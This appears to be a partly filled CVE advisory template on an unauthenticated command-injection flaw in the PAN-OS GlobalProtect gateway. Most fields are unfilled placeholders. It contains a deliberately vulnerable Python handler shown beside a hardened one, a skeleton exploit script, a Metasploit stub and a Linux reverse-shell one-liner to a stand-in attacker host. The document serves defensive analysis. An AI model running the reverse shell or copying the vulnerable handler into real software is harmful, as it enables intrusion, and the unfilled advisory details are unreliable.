Overview

Palo Alto Networks PAN-OS, specifically the GlobalProtect gateway feature, which by design is exposed on the untrusted interface of perimeter firewalls.

Affected Systems

Vulnerable Versions

Vendor | Product | Affected Versions | Fixed Version
Palo Alto Networks | PAN-OS (GlobalProtect gateway) | [X.X - X.X] | [X.X] or TBA

Platform-Specific Details

Operating Systems:

  • PAN-OS (the firewall's own operating system). The flaw is in the GlobalProtect gateway running on the appliance, so the client operating system is not relevant to this issue.

Common Affected Applications:

  • PAN-OS GlobalProtect gateway

Prerequisites:

  • Network reachability to the GlobalProtect gateway interface
  • No credentials required (unauthenticated)

Technical Analysis

Root Cause

Unauthenticated arbitrary file creation that leads to OS command injection on the firewall, triggered by crafted requests to the GlobalProtect gateway. Because the gateway is reachable from the untrusted side by design, no credentials or internal network access are needed to reach the vulnerable code path.
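To illustrate the bug class described above, here is an added example that is not PAN-OS code and is not from the original page: a hypothetical request handler that writes a file named by an unauthenticated request parameter and later hands that same string to a shell, next to a hardened version of the handler. The `session_id` parameter, the `cat` post-processing stage, the directory layout and the attacker inputs are all constructed for illustration.

```python
#!/usr/bin/env python3
"""Hypothetical handler showing arbitrary file creation feeding a shell
command, and the hardened form. Not PAN-OS code; all names are assumed."""
import os
import re
import subprocess
import tempfile

# Allowlist for the request-controlled name: no separators, no shell metacharacters.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")


def vulnerable_handler(base_dir, session_id, body):
    """VULNERABLE: the unauthenticated 'session_id' parameter is used verbatim
    as a file name and is then pasted into a shell command line."""
    path = os.path.join(base_dir, session_id)          # "../x" escapes base_dir
    with open(path, "w") as f:                          # arbitrary file creation
        f.write(body)
    # A later stage hands the same string to a shell: ';' or '$(...)' injects.
    proc = subprocess.run(f"cat {path}", shell=True,
                          capture_output=True, text=True)
    return path, proc.stdout


def hardened_handler(base_dir, session_id, body):
    """Hardened: validate the name, confine the resolved path to base_dir,
    and never build a shell command line from request data."""
    if not SAFE_NAME.fullmatch(session_id) or session_id in (".", ".."):
        raise ValueError("rejected session_id")
    base = os.path.realpath(base_dir)
    path = os.path.realpath(os.path.join(base, session_id))
    if os.path.dirname(path) != base:
        raise ValueError("path escapes base_dir")
    with open(path, "w") as f:
        f.write(body)
    proc = subprocess.run(["cat", path], capture_output=True, text=True)  # no shell
    return path, proc.stdout


def demo():
    """Run both handlers on constructed attacker input and on benign input."""
    root = tempfile.mkdtemp()
    base = os.path.join(root, "sessions")
    os.mkdir(base)

    # Constructed attacker input 1: shell metacharacters in the name
    _, out = vulnerable_handler(base, "x; echo INJECTED", "hello")
    # Constructed attacker input 2: traversal out of the session directory
    written, _ = vulnerable_handler(base, "../escaped", "hello")
    escaped = not os.path.realpath(written).startswith(
        os.path.realpath(base) + os.sep)

    rejected = 0
    for bad in ("x; echo INJECTED", "../escaped"):
        try:
            hardened_handler(base, bad, "hello")
        except ValueError:
            rejected += 1
    _, ok_out = hardened_handler(base, "sess-123", "hello")

    return {
        "injected": "INJECTED" in out,      # vulnerable handler ran the echo
        "escaped": escaped,                 # vulnerable handler wrote outside base
        "hardened_rejected": rejected,      # both attacker inputs refused
        "hardened_output": ok_out,          # benign request still works
    }


if __name__ == "__main__":
    print(demo())
```

The two defences are independent and both are needed: the allowlist stops traversal and metacharacters at the boundary, the realpath check catches anything the allowlist would miss, and dropping `shell=True` removes the injection sink entirely even if a bad name slipped through.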

Scanning Tools

# Nmap
nmap --script [SCRIPT_NAME] -p [PORT] [TARGET]
 
# Nuclei
nuclei -t cves/[YEAR]/CVE-YYYY-XXXXX.yaml -u [TARGET]

Exploitation

Detection

Check if system is vulnerable:

# Linux detection commands
[DETECTION_COMMAND]
 
# Windows detection commands
[DETECTION_COMMAND]

Version checking:

# Check version
[VERSION_CHECK_COMMAND]
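As an added example (not from the original page and not a Palo Alto tool), the following parses the sw-version line from PAN-OS `show system info` CLI output and compares it, hotfix suffix included, against a list of fixed releases, one per major.minor train. The sample CLI output and the FIXED_VERSIONS_EXAMPLE list are constructed placeholders; substitute the fixed versions from the vendor advisory.

```python
#!/usr/bin/env python3
"""Compare a PAN-OS sw-version (e.g. 10.2.9-h1) against per-train fixed releases."""
import re

# Constructed sample of PAN-OS 'show system info' output (not a real device).
SAMPLE_SYSTEM_INFO = """\
hostname: fw-edge-01
ip-address: 192.0.2.10
model: PA-3220
sw-version: 10.2.9-h1
global-protect-client-package-version: 6.2.1
"""

# Placeholder fixed releases, one per major.minor train. These are made-up
# values for illustration; take the real list from the vendor advisory.
FIXED_VERSIONS_EXAMPLE = ["10.2.9-h2", "11.0.4", "11.1.2-h3"]

VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$")


def parse_panos_version(ver):
    """'10.2.9-h1' -> (10, 2, 9, 1). A release without a hotfix gets hotfix 0,
    so 10.2.9 sorts below 10.2.9-h1, which is where naive string compares go wrong."""
    m = VERSION_RE.match(ver.strip())
    if not m:
        raise ValueError(f"unrecognised PAN-OS version: {ver!r}")
    major, minor, maint, hotfix = m.groups()
    return int(major), int(minor), int(maint), int(hotfix or 0)


def sw_version_from_system_info(text):
    """Pull the sw-version field out of 'show system info' output."""
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip() == "sw-version":
            return value.strip()
    raise ValueError("sw-version line not found")


def is_fixed(ver, fixed_versions):
    """True when ver is at or above the fixed release of its own major.minor
    train. A train with no fixed release in the list is reported as not fixed,
    the safe default for an end-of-life or unlisted train."""
    v = parse_panos_version(ver)
    for fixed in fixed_versions:
        f = parse_panos_version(fixed)
        if f[:2] == v[:2]:
            return v >= f
    return False


def check_device(system_info, fixed_versions=FIXED_VERSIONS_EXAMPLE):
    """Return (running_version, fixed?) for one device's CLI output."""
    ver = sw_version_from_system_info(system_info)
    return ver, is_fixed(ver, fixed_versions)


if __name__ == "__main__":
    ver, fixed = check_device(SAMPLE_SYSTEM_INFO)
    print(f"{ver}: {'fixed' if fixed else 'VULNERABLE (or unlisted train)'}")
```

Feed it the output of `show system info` from the firewall CLI; the same text is available through the PAN-OS XML API as an operational command (`<show><system><info></info></system></show>`), which makes it easy to sweep a fleet.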

Proof of Concept (PoC)

Ethical Use Only: This PoC is for authorized testing only. Unauthorized access is illegal.

Method 1: [EXPLOITATION_METHOD_NAME]

Step 1: [DESCRIPTION]

# Commands
[EXPLOIT_COMMANDS]

Step 2: [DESCRIPTION]

# Commands
[EXPLOIT_COMMANDS]

Step 3: Verify success

# Verification
[VERIFICATION_COMMANDS]

Method 2: Using Metasploit (if applicable)

msfconsole
use exploit/[MODULE_PATH]
set RHOSTS [TARGET_IP]
set LHOST [ATTACKER_IP]
set LPORT 4444
exploit

Exploitation Code

#!/usr/bin/env python3
"""
CVE-YYYY-XXXXX Exploit
Author: [YOUR_NAME]
Description: [BRIEF_DESCRIPTION]
"""

import sys

import requests


def exploit(target, command):
    """
    Exploit CVE-YYYY-XXXXX: send the crafted request to the target and
    report the response. `command` is the OS command to inject.
    """
    payload = {
        # Craft your payload here; embed `command` at the injection point
    }

    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0",
    }

    try:
        response = requests.post(
            f"{target}/vulnerable-endpoint",
            json=payload,
            headers=headers,
            timeout=10,
        )
        print(f"[+] Status: {response.status_code}")
        print(f"[+] Response: {response.text}")
        return response
    except requests.RequestException as e:
        print(f"[-] Error: {e}")
        return None


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 exploit.py <target_url> [command]")
        sys.exit(1)

    # Default to a harmless command that proves code execution
    exploit(sys.argv[1], sys.argv[2] if len(sys.argv) > 2 else "id")

Payload Examples

Basic payload:

[BASIC_PAYLOAD]

Reverse shell (Linux):

bash -c 'bash -i >& /dev/tcp/ATTACKER-IP/4444 0>&1'

Reverse shell (Windows):

[WINDOWS_REVERSE_SHELL]

Detection & Monitoring

Indicators of Compromise (IoCs)

Network Indicators:

IP Addresses:
- [MALICIOUS_IP_1]
- [MALICIOUS_IP_2]

Domains:
- [MALICIOUS_DOMAIN]

User-Agents:
- [MALICIOUS_USER_AGENT]

File Indicators:

File Hashes (SHA256):
- [HASH_1]

File Paths:
- [SUSPICIOUS_FILE_PATH]

Process Indicators:

  • [SUSPICIOUS_PROCESS_1]
  • [SUSPICIOUS_PROCESS_2]

Detection Rules

Sigma Rule

title: CVE-YYYY-XXXXX Exploitation Attempt
id: [GENERATE_UUID]
status: experimental
description: Detects exploitation attempts for CVE-YYYY-XXXXX
references:
    - https://nvd.nist.gov/vuln/detail/CVE-YYYY-XXXXX
author: [YOUR_NAME]
date: YYYY-MM-DD
logsource:
    category: [LOG_CATEGORY]
    product: [PRODUCT]
detection:
    selection:
        field1: 'value1'
        field2: 'value2'
    condition: selection
falsepositives:
    - [FALSE_POSITIVE_1]
level: [critical/high/medium]
tags:
    - attack.[TACTIC]
    - attack.[TECHNIQUE]
    - cve.YYYY.XXXXX

Snort Rule

alert tcp any any -> any [PORT] (msg:"CVE-YYYY-XXXXX Exploitation Attempt"; 
content:"[PATTERN]"; 
flow:to_server,established; 
classtype:attempted-admin; 
sid:[SID]; 
rev:1;)

Log Analysis

What to look for:

  • [LOG_INDICATOR_1]
  • [LOG_INDICATOR_2]
  • [LOG_INDICATOR_3]

Example log entry:

[YYYY-MM-DD HH:MM:SS] [LOG_ENTRY_EXAMPLE]

Remediation

Immediate Actions

  1. [ ] Identify affected systems

    # Commands to identify
    [IDENTIFICATION_COMMANDS]
  2. [ ] Isolate affected systems

    # Isolation commands
    [ISOLATION_COMMANDS]
  3. [ ] Review logs for exploitation

    # Log review commands
    [LOG_REVIEW_COMMANDS]

Patching

Vendor Patches

Vendor | Advisory | Patch Link | Status
Palo Alto Networks | [ADVISORY_ID] | [LINK] | [STATUS]

Manual Patching

# Linux
[LINUX_PATCH_COMMANDS]
 
# Windows
[WINDOWS_PATCH_COMMANDS]

Verification

# Verify patch is applied
[VERIFICATION_COMMANDS]

Workarounds

Option 1: [WORKAROUND_NAME]

# Workaround commands
[WORKAROUND_COMMANDS]

Option 2: [ALTERNATE_WORKAROUND]

# Alternate workaround
[ALTERNATE_COMMANDS]

Long-term Mitigations

  • Mitigation 1
  • Mitigation 2
  • Mitigation 3
  • Mitigation 4
  • Mitigation 5

MITRE ATT&CK Mapping

Tactics:

Techniques:

Sub-techniques:

  • T0000.001 - [SUB_TECHNIQUE_NAME]

References

Official Sources

  1. NVD - CVE-YYYY-XXXXX
  2. MITRE - CVE-YYYY-XXXXX
  3. Vendor Advisory

Technical Analysis

  1. Analysis 1
  2. Analysis 2

Exploits & PoCs

  1. GitHub - PoC
  2. ExploitDB

Research Papers

  1. Paper 1
  2. Blog Post